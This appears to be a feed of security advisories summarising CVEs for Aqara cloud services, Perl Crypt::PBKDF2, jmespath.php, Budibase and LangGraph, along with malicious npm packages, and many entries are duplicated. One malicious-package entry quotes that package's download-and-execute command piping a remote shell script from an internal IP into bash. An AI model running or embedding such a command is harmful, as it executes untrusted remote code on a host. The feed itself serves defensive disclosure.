CVE-2026-50082

The Aqara Cloud Developer Portal developer.aqara.com issued a developer token to any email address supplied by the attacker. This is an instance of "CWE-306: Missing Authentication for Critical Function" with an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 6.5 Medium. When...

UBUNTU-CVE-2026-9638

Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography...

Malicious code in vite-react-toolkit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 879905a93676f42398cca583eb921d5ee04a7c84068d7aa0123a7cefdf26d995 On import/require of vite-react-toolkit, src/features/extras/config.js reached via the package main → createConfig.js → features/plugins.js side-effe...

MAL-2026-5701 Malicious code in vite-react-toolkit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 879905a93676f42398cca583eb921d5ee04a7c84068d7aa0123a7cefdf26d995 On import/require of vite-react-toolkit, src/features/extras/config.js reached via the package main → createConfig.js → features/plugins.js side-effe...

MAL-2026-5694 Malicious code in internallib_v856 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

Malicious code in internallib_v856 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

MAL-2026-5695 Malicious code in internallib_v984 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8 Package exports a single command function that, when invoked, performs three coordinated attacks against the host: 1 appends a hardcoded...

Malicious code in internallib_v984 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8 Package exports a single command function that, when invoked, performs three coordinated attacks against the host: 1 appends a hardcoded...

CVE-2026-54133

jmespath.php allows users to use JMESPath, software for declaratively specifying how to extract elements from a JSON document, in PHP applications with PHP data structures. Versions prior to 2.9.1 can generate and execute attacker-controlled PHP code when JmesPath\CompilerRuntime is used with an...

Improper Handling of Case Sensitivity

Overview Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity through the getRouteRules function in the route rules matcher. An attacker can evade prerender, SSR, or redirect rules by sending a request with a path that uses different letter casing from the...

GHSA-G6QX-G4PR-92V7 Budibase: SSRF via OAuth2 Config Validation — Missing fetchWithBlacklist Protection

Summary The OAuth2 token fetch function in packages/server/src/sdk/workspace/oauth2/utils.ts line 59 uses raw fetchconfig.url with no SSRF protection. The safe wrapper fetchWithBlacklist exists in the same codebase and is used in every other outbound HTTP call automation steps, plugin downloads,...

Budibase: SSRF via OAuth2 Config Validation — Missing fetchWithBlacklist Protection

Summary The OAuth2 token fetch function in packages/server/src/sdk/workspace/oauth2/utils.ts line 59 uses raw fetchconfig.url with no SSRF protection. The safe wrapper fetchWithBlacklist exists in the same codebase and is used in every other outbound HTTP call automation steps, plugin downloads,...

Improper Neutralization of Special Elements in Data Query Logic

Overview @langchain/langgraph-checkpoint-mongodb is a LangGraph Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Data Query Logic in the MongoDBSaver.getTuple function. An attacker can access checkpoint data belonging to other tenants by injecting...

CVE-2026-50086 Aqara unauthenticated AES oracle

The Aqara IAM/SSO gateway gw-builder.aqara.com exposes bidirectional AES round-trups against the platform's signing key without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and "CWE-327: Use of a Broken or Risky Cryptographic Algorithm," and has a...

CVE-2026-50086 Aqara unauthenticated AES oracle

The Aqara IAM/SSO gateway gw-builder.aqara.com exposes bidirectional AES round-trups against the platform's signing key without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and "CWE-327: Use of a Broken or Risky Cryptographic Algorithm," and has a...

EUVD-2026-36476

The Aqara IAM/SSO gateway gw-builder.aqara.com exposes bidirectional AES round-trups against the platform's signing key without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and "CWE-327: Use of a Broken or Risky Cryptographic Algorithm," and has a...

CVE-2026-50086

The CVE-2026-50086 entry concerns the Aqara IAM/SSO gateway (gw-builder.aqara.com), where bidirectional AES round-trups are exposed against the platform's signing key without authentication. This is identified as CWE-306 (Missing Authentication for Critical Function) and CWE-327 (Use of a Broken ...

EUVD-2026-36475

The Aqara Board service op-test.aqara.com accepts arbitrary MQTT command payloads, and forwards them to the platfom's HiveMQ broker without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and has an estimated CVSS...

CVE-2026-50085 Aqara Board IoT insecure debug API

The Aqara Board service op-test.aqara.com accepts arbitrary MQTT command payloads, and forwards them to the platfom's HiveMQ broker without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and has an estimated CVSS...

CVE-2026-50085 Aqara Board IoT insecure debug API

The Aqara Board service op-test.aqara.com accepts arbitrary MQTT command payloads, and forwards them to the platfom's HiveMQ broker without authentication. This is an instance of "CWE-306: Missing Authentication for Critical Function" and has an estimated CVSS...